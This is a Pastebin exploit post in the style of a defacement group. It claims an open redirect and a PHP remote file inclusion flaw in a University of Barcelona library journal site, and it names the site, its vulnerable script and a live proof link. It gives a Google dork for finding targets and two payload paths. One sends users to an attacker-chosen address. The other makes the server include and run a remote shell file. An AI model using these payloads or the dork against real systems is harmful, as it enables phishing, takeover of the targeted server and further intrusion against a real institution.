Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ############################################################################################
- # Exploit Title : University of Barcelona Librarianship Center Spain RFI Open Redirection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 22/03/2019
- # Vendor Homepage : bid.ub.edu
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : High
- # Google Dorks : BiD: textos universitaris de biblioteconomia i documentació Universitat de Barcelona
- # Vulnerability Type :
- CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
- CWE-98 [ Improper Control of Filename for Include/Require Statement
- in PHP Program ('PHP Remote File Inclusion') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Impact :
- ***********
- * University of Barcelona Librarianship and Documentation Center in Spain - accepts a user-controlled input that specifies
- a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. An http parameter may contain
- a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to
- a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.
- Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
- Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites.
- This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter
- redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another
- company. Visiting unreal web page user's computer becomes affected by malware the task of which is
- to deceive the valid actor and steal his personal data.
- * The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the
- input before its usage in "require," "include," or similar functions.
- ############################################################################################
- # Open Redirection and Remote File Inclusion Exploit :
- ************************************************
- /consulta_articulos.php?url=https://www.[REDIRECTION-ADDRESS].gov
- /consulta_articulos.php?url=https://www.[SHELL-ADDRESS].gov/sh3ll.txt.php
- ############################################################################################
- # Example Vulnerable Site :
- *************************
- [+] bid.ub.edu/consulta_articulos.php?url=https://cxsecurity.com/ => [ Proof ] => archive.is/6pcgC
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement